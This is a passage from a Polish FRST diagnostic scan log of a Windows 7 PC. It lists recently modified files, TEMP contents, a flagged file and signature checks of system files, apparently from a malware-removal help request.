- 00029952 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-05-13 07:59 - 2011-04-12 15:21 - 00739694 _____ C:\Windows\system32\perfh015.dat 2017-05-13 07:59 - 2011-04-12 15:21 - 00155268 _____ C:\Windows\system32\perfc015.dat 2017-05-13 07:59 - 2009-07-14 07:13 - 01668226 _____ C:\Windows\system32\PerfStringBackup.INI 2017-05-13 07:59 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf 2017-05-13 07:58 - 2016-08-13 12:12 - 00000000 ____D C:\Program Files (x86)\Steam 2017-05-13 07:52 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2017-05-12 21:31 - 2016-08-13 16:21 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\uTorrent 2017-05-12 16:44 - 2016-08-14 14:52 - 00803320 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2017-05-12 16:44 - 2016-08-14 14:52 - 00144888 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2017-05-12 16:44 - 2016-08-14 14:52 - 00000000 ____D C:\Windows\SysWOW64\Macromed 2017-05-12 16:44 - 2016-08-14 14:52 - 00000000 ____D C:\Windows\system32\Macromed 2017-05-12 16:44 - 2016-08-14 14:51 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Adobe 2017-05-12 16:42 - 2017-03-16 17:32 - 00000000 ____D C:\Users\Kamcio\Desktop\Stare dane programu Firefox 2017-05-12 16:41 - 2016-08-13 11:38 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Mozilla 2017-05-12 12:01 - 2017-02-11 20:49 - 00000000 ____D C:\Users\Kamcio\AppData\Local\CrashDumps 2017-05-10 07:26 - 2009-07-14 07:08 - 00032604 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2017-05-03 14:33 - 2016-08-13 11:38 - 00001940 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2017-04-24 14:40 - 2017-03-17 15:41 - 00000000 ____D C:\Users\Kamcio\Desktop\Aukcje 2017-04-19 13:54 - 2016-09-04 08:39 - 00000000 ____D C:\Users\Kamcio\Documents\888poker 2017-04-19 13:54 - 2015-06-11 23:01 - 00000000 ____D C:\Windows\Panther 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\Setup 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\oobe 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\MUI 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\SysWOW64\com 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\security 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\Registration 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PLA 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\IME 2017-04-19 13:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\Help 2017-04-19 13:53 - 2016-10-03 13:23 - 00000000 ____D C:\Program Files (x86)\ImgBurn 2017-04-19 13:53 - 2016-09-04 08:38 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\PacificPoker 2017-04-19 13:53 - 2016-08-13 11:50 - 00000000 ____D C:\Users\Kamcio\AppData\Local\NVIDIA 2017-04-19 13:53 - 2016-08-13 11:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-04-19 13:53 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files\Windows Sidebar 2017-04-19 13:53 - 2009-07-14 07:32 - 00000000 ____D C:\Program Files (x86)\Windows Sidebar 2017-04-19 13:53 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\System 2017-04-19 13:53 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared 2017-04-19 08:12 - 2016-08-13 11:33 - 00001735 _____ C:\Users\Kamcio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2017-04-18 11:06 - 2017-03-09 14:21 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Browser-Security 2017-04-13 14:20 - 2017-04-10 13:32 - 00003568 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT 2017-04-13 14:18 - 2017-03-09 14:21 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\ScreenShot ==================== Pliki w katalogu głównym wybranych folderów ======= 2016-09-20 10:34 - 2016-09-20 10:39 - 0000024 _____ () C:\Users\Kamcio\AppData\Roaming\icpki_sign.config 2017-02-11 18:55 - 2017-02-11 18:55 - 0000016 _____ () C:\ProgramData\mntemp Pliki do przeniesienia lub usunięcia: ==================== C:\Users\Kamcio\AppData\Local\background_fault\aswRD.exe Niektóre pliki w TEMP: ==================== 2017-02-11 18:55 - 2017-02-11 18:55 - 0000512 _____ () C:\Users\Kamcio\AppData\Local\Temp\3d51890c7b88e4feeeed777176b46429.dll 2017-02-11 18:56 - 2017-02-22 15:31 - 0000056 _____ () C:\Users\Kamcio\AppData\Local\Temp\ac9fa174b17dc7fa9dfb079a141216e9.dll 2016-12-23 12:41 - 2016-12-23 12:41 - 0737856 _____ (Oracle Corporation) C:\Users\Kamcio\AppData\Local\Temp\jre-8u111-windows-au.exe 2017-02-04 09:57 - 2017-02-04 09:57 - 0739904 _____ (Oracle Corporation) C:\Users\Kamcio\AppData\Local\Temp\jre-8u121-windows-au.exe 2015-07-31 16:06 - 2015-07-31 16:06 - 0242864 ____R (Microsoft Corporation) C:\Users\Kamcio\AppData\Local\Temp\ose00000.exe 2016-12-06 14:14 - 2016-12-06 14:14 - 77105961 _____ () C:\Users\Kamcio\AppData\Local\Temp\setup.exe ==================== Bamital & volsnap ====================== (Brak automatycznej naprawy dla plików które nie przeszły weryfikacji.) C:\Windows\system32\winlogon.exe => Plik podpisany cyfrowo C:\Windows\system32\wininit.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\wininit.exe => Plik podpisany cyfrowo C:\Windows\explorer.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\explorer.exe => Plik podpisany cyfrowo C:\Windows\system32\svchost.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\svchost.exe => Plik podpisany cyfrowo C:\Windows\system32\services.exe => Plik podpisany cyfrowo C:\Windows\system32\User32.dll => Plik podpisany cyfrowo C:\Windows\SysWOW64\User32.dll => Plik podpisany cyfrowo C:\Windows\system32\userinit.exe => Plik podpisany cyfrowo C:\Windows\SysWOW64\userinit.exe => Plik podpisany cyfrowo C:\Windows\system32\rpcss.dll => Plik podpisany cyfrowo C:\Windows\system32\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\SysWOW64\dnsapi.dll => Plik podpisany cyfrowo C:\Windows\system32\Drivers\volsnap.sys => Plik podpisany cyfrowo LastRegBack: 2017-05-03 14:58 ==================== Koniec FRST.txt ============================